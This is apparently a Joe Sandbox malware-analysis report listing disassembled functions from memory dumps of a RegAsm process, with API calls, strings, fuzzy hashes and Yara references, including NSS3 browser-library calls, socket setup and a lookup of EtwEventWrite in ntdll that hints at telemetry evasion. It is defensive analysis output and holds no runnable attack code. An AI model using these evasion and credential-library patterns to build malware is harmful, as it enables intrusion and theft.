Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorInformationLastLogicalProcessorwsprintf
String ID: |hC
API String ID: 4210301552-3764107683
Opcode ID: 838f709e0f0e320e13c54958f87108ccfda66de5294ad5fbe9bd40c1f62824bb
Instruction ID: 25986b91b1c923d13666d9982c3d02ad3cfbbbbf9ca048b9ad1de52439bfed93
Opcode Fuzzy Hash: 838f709e0f0e320e13c54958f87108ccfda66de5294ad5fbe9bd40c1f62824bb
Instruction Fuzzy Hash: 02313C72D4022B9BCB259F15DD819BEB7BDEB48705F1140BFE209A2250DA389FC58F19

Function 00413430 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 79stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 0041344F
StrCmpCA.SHLWAPI(00000000,004367E0,?), ref: 0041347B
strtok_s.MSVCRT ref: 004134E1

Strings

8xA, xrefs: 00413441, 00413444

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: strtok_s
String ID: 8xA
API String ID: 3330995566-855961538
Opcode ID: d6f3c9c2df4ddbb8ee817af6d5565fe8b689f0ac8fb20a69878d5cdb71e40a4e
Instruction ID: 978984dfa5c9865e5be66d2eb4a3f69869fc453b95026699ddd48f540133a583
Opcode Fuzzy Hash: d6f3c9c2df4ddbb8ee817af6d5565fe8b689f0ac8fb20a69878d5cdb71e40a4e
Instruction Fuzzy Hash: 6B21C771A00105BFCB15DF54C881EEAB7ACFF18315F10805BE805EB581D778EA958B88

Function 6C0E6C90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6C0E6D36

Strings

%s at line %d of [%.10s], xrefs: 6C0E6D2F
database corruption, xrefs: 6C0E6D2A
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C0E6D20

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: 9a789041f7e2c85729ba5987aacea10b84ae409a3276ac69c7bc01689ad4cc00
Instruction ID: c968dd391a4e6e31035d858b62de862a8ba9849ec40111eef77be92f2c35d053
Opcode Fuzzy Hash: 9a789041f7e2c85729ba5987aacea10b84ae409a3276ac69c7bc01689ad4cc00
Instruction Fuzzy Hash: F0212730A483089FCB10CE19E841B5AB7F2AF48318F94852CD9499BF51E770F9488791

Function 004132E8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00413307
StrCmpCA.SHLWAPI(00000000,004367D4,?), ref: 00413340

Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,004170CD,004366CF,004366CE,?,?,?,?,004184E8), ref: 0041054F
Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,004170CD,004366CF,004366CE,?,?,?,?,004184E8), ref: 00410581

strtok_s.MSVCRT ref: 0041337C

Strings

{wA, xrefs: 004132F9, 004132FC

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: strtok_s$lstrcpylstrlen
String ID: {wA
API String ID: 348468850-3326132372
Opcode ID: 6a436478f4904239c9105a492d626f8b29cacef25f60e9acba592045e42b5dd3
Instruction ID: 6d9467070b09e6031c23d1f832d1343d52e7ba274a9008e741ee46abeb3fa112
Opcode Fuzzy Hash: 6a436478f4904239c9105a492d626f8b29cacef25f60e9acba592045e42b5dd3
Instruction Fuzzy Hash: B3118171900109AFDB00DF54C945BDAB7B8BF1430AF158157EC15E7192EB78DB888B98

Function 6C21CC70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 6C21CD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C21CC7B), ref: 6C21CD7A
Part of subcall function 6C21CD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C21CD8E
Part of subcall function 6C21CD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C21CDA5
Part of subcall function 6C21CD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C21CDB8

PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6C21CCB5
memcpy.VCRUNTIME140(6C2B14F4,6C2B02AC,00000090), ref: 6C21CCD3
memcpy.VCRUNTIME140(6C2B1588,6C2B02AC,00000090), ref: 6C21CD2B

Part of subcall function 6C139AC0: socket.WSOCK32(?,00000017,6C1399BE), ref: 6C139AE6
Part of subcall function 6C139AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6C1399BE), ref: 6C139AFC

Part of subcall function 6C140590: closesocket.WSOCK32(6C139A8F,?,?,6C139A8F,00000000), ref: 6C140597

Strings

Ipv6_to_Ipv4 layer, xrefs: 6C21CCB0

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
String ID: Ipv6_to_Ipv4 layer
API String ID: 1231378898-412307543
Opcode ID: ebcd8e82b7d0162515e36f599b7a8f07c4af2018a436e5a3a489eb928ac20501
Instruction ID: 0f50e539e9debe4ca603e9c355dc144f3fe0c9185ea09377b952e4b32d7d6130
Opcode Fuzzy Hash: ebcd8e82b7d0162515e36f599b7a8f07c4af2018a436e5a3a489eb928ac20501
Instruction Fuzzy Hash: 131175F5A042485FDB009F5A8A4A782B6B8934665CF141035ED099BFC1E671D4C4C7E9

Function 0040F27D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040F282

Part of subcall function 0042EB58: std::exception::exception.LIBCMT ref: 0042EB6D
Part of subcall function 0042EB58: __CxxThrowException@8.LIBCMT ref: 0042EB82
Part of subcall function 0042EB58: std::exception::exception.LIBCMT ref: 0042EB93

std::_Xinvalid_argument.LIBCPMT ref: 0040F28D

Part of subcall function 0042EBA5: std::exception::exception.LIBCMT ref: 0042EBBA
Part of subcall function 0042EBA5: __CxxThrowException@8.LIBCMT ref: 0042EBCF
Part of subcall function 0042EBA5: std::exception::exception.LIBCMT ref: 0042EBE0

Strings

string too long, xrefs: 0040F27D
invalid string position, xrefs: 0040F288

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: invalid string position$string too long
API String ID: 1823113695-4289949731
Opcode ID: 349eb755c2379f9db011a58316f10384528be111fbdd8a1976e705f22fc068b7
Instruction ID: cd3694dea35895355e46a83a3e4de23ceeb02e2cb3378368ed2cad5f3159caa1
Opcode Fuzzy Hash: 349eb755c2379f9db011a58316f10384528be111fbdd8a1976e705f22fc068b7
Instruction Fuzzy Hash: 4CD012A164020C7BDF04E79AE8069CDBAE99B88714F20017BA605D3681EA7467005599

Function 00411D61 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 18memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00412301,?), ref: 00411D6C
HeapAlloc.KERNEL32(00000000), ref: 00411D73
wsprintfW.USER32 ref: 00411D84

Strings

%hs, xrefs: 00411D7E

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcesswsprintf
String ID: %hs
API String ID: 659108358-2783943728
Opcode ID: 4a334a68f77ee529b07100ebaf8fd433748c05a496cd67b4ec7d4052c9669952
Instruction ID: 737ca738a9fa2d094c2373c7a79b415d912bfa0f8f863b3815ed0a4c2983db16
Opcode Fuzzy Hash: 4a334a68f77ee529b07100ebaf8fd433748c05a496cd67b4ec7d4052c9669952
Instruction Fuzzy Hash: A0D0A73134031477C61017D4BC0DF9E3F2CDB057A2F001130FA0DD5150C96548144BDD

Function 004013F6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00401402
GetDeviceCaps.GDI32(00000000,0000000A), ref: 0040140D
ReleaseDC.USER32(00000000,00000000), ref: 00401416

Strings

DISPLAY, xrefs: 004013FD

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CapsCreateDeviceRelease
String ID: DISPLAY
API String ID: 1843228801-865373369
Opcode ID: ab5678a75f8a4ab5def4bec3e9d35534c8f2dfb9c747e2ed5e37e13a090dac54
Instruction ID: cd98ece1bb7c03cf4b13b9cfde1fcc45a401c32c2c577d41a1832e4907e0de71
Opcode Fuzzy Hash: ab5678a75f8a4ab5def4bec3e9d35534c8f2dfb9c747e2ed5e37e13a090dac54
Instruction Fuzzy Hash: 96D012353C03047BE1781B54BC5FF1A2934D7C5F02F201124F311680D046A41402963E

Function 004018B5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll.dll), ref: 004018BA
GetProcAddress.KERNEL32(00000000,EtwEventWrite), ref: 004018CB

Strings

ntdll.dll, xrefs: 004018B5
EtwEventWrite, xrefs: 004018C5

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: EtwEventWrite$ntdll.dll
API String ID: 1646373207-1851843765
Opcode ID: 0d3cde939e28b5fbedd27beab3b7bab0456bd59833cc30e68c8719833b402868
Instruction ID: 71ddae42ae3044b5a97883ee0371119e3e2931b63267310e421d9ab91a49a400
Opcode Fuzzy Hash: 0d3cde939e28b5fbedd27beab3b7bab0456bd59833cc30e68c8719833b402868
Instruction Fuzzy Hash: 59B0927078020097CE142B716DADF16B66A6A44B02BA061A2A68AD01A0D7BCB128961E

Function 004250A1 Relevance: 6.1, APIs: 4, Instructions: 132COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd_noexit.LIBCMT ref: 004250D4
_siglookup.LIBCMT ref: 004250FB
DecodePointer.KERNEL32(00000000), ref: 00425153
__lock.LIBCMT ref: 0042517A

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: DecodePointer__getptd_noexit__lock_siglookup
String ID:
API String ID: 2847133137-0
Opcode ID: a3c8eafde11903a12ba30f40d8dc320cbfd575ed32fbe191a0c909d6b63a4658
Instruction ID: 0b1ca2716bf2375d76db7d4f714061106cdc12c46c38c2196845fce694a54f68
Opcode Fuzzy Hash: a3c8eafde11903a12ba30f40d8dc320cbfd575ed32fbe191a0c909d6b63a4658
Instruction Fuzzy Hash: DA415A70F00A259BCF289F68E8846AEB7B0BB45315BA4452BE801A7791C73C9C51CB6D

Function 6C268530 Relevance: 6.1, APIs: 4, Instructions: 127threadnetworkCOMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6C2B14E4,6C21CC70), ref: 6C268569
gethostbyaddr.WSOCK32(?,00000004,00000002), ref: 6C2685AD
GetLastError.KERNEL32(?,00000004,00000002), ref: 6C2685B6
PR_GetCurrentThread.NSS3(?,00000004,00000002), ref: 6C2685C6

Part of subcall function 6C140F00: PR_GetPageSize.NSS3(6C140936,FFFFE8AE,?,6C0D16B7,00000000,?,6C140936,00000000,?,6C0D204A), ref: 6C140F1B
Part of subcall function 6C140F00: PR_NewLogModule.NSS3(clock,6C140936,FFFFE8AE,?,6C0D16B7,00000000,?,6C140936,00000000,?,6C0D204A), ref: 6C140F25

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: CallCurrentErrorLastModuleOncePageSizeThreadgethostbyaddr
String ID:
API String ID: 4254312643-0
Opcode ID: f898d5e7ad82db3253f9c5b142f4437c5d8e8d5c3d85d879cbe455b57612db95
Instruction ID: 642c2de274929d9d05bc13344a71c7e55a9f4f357a1efb31839435b1a4c70fd4
Opcode Fuzzy Hash: f898d5e7ad82db3253f9c5b142f4437c5d8e8d5c3d85d879cbe455b57612db95
Instruction Fuzzy Hash: 7341EEB0A0834FABE7108A278844756B7B4EB4632DF09472AED1543EC1D77499C8CBE1

Function 6C1A0420 Relevance: 6.1, APIs: 4, Instructions: 117memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(00000000,?,6C18C97F,?,?,?), ref: 6C1A04BF
TlsGetValue.KERNEL32(00000000,?,6C18C97F,?,?,?), ref: 6C1A04F4
EnterCriticalSection.KERNEL32(?,?,?,6C18C97F,?,?,?), ref: 6C1A050D
PR_Unlock.NSS3(?,?,?,?,6C18C97F,?,?,?), ref: 6C1A0556

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Alloc_CriticalEnterSectionUnlockUtilValue
String ID:
API String ID: 349578545-0
Opcode ID: c324150878ad08870ec9808e6955832c3f92f91e5ba8a3f3f795b1d434dc5419
Instruction ID: f77de5a5c9a612a5e8afa06f2a400895e5a6affaf73b2bc80ff3e9baa010a3b9
Opcode Fuzzy Hash: c324150878ad08870ec9808e6955832c3f92f91e5ba8a3f3f795b1d434dc5419
Instruction Fuzzy Hash: E4415AB8A01642CFDB04DF69C584669BBF0FF54318F158569D8AA8BB41E731E992CB80

Function 6C156C50 Relevance: 6.1, APIs: 4, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C156C8D
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C156CA9
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C156CC0
SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6C278FE0), ref: 6C156CFE

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Util$Alloc_Arena$EncodeItem_memset
String ID:
API String ID: 2370200771-0
Opcode ID: 24ee2da3e8ff0c24edf40d5574fb52e4afbd7a3b96c6177b366aa21449c4ada5
Instruction ID: 41e0675fe71322754243ee3ccbce1e24bdcc4830a2c7dc925a27181e03681520
Opcode Fuzzy Hash: 24ee2da3e8ff0c24edf40d5574fb52e4afbd7a3b96c6177b366aa21449c4ada5
Instruction Fuzzy Hash: B231ACB1A0021A9FEB08CF65C881ABFBBF5EF99248B50442DD915E7710EB31D915CBE0

Function 0041BF1F Relevance: 6.1, APIs: 4, Instructions: 98timeCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,74DE83C0,00000000,?,?,?,?,?,?,0041C4E8,?,00416E80,?), ref: 0041BF72
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,0041C4E8,?,00416E80), ref: 0041BFA2
GetLocalTime.KERNEL32(?,?,?,?,?,?,?,0041C4E8,?,00416E80,?), ref: 0041BFCE
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,0041C4E8,?,00416E80,?), ref: 0041BFDC

Part of subcall function 0041B8EA: GetFileInformationByHandle.KERNEL32(?,?,00000000,?,01302528), ref: 0041B91E

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
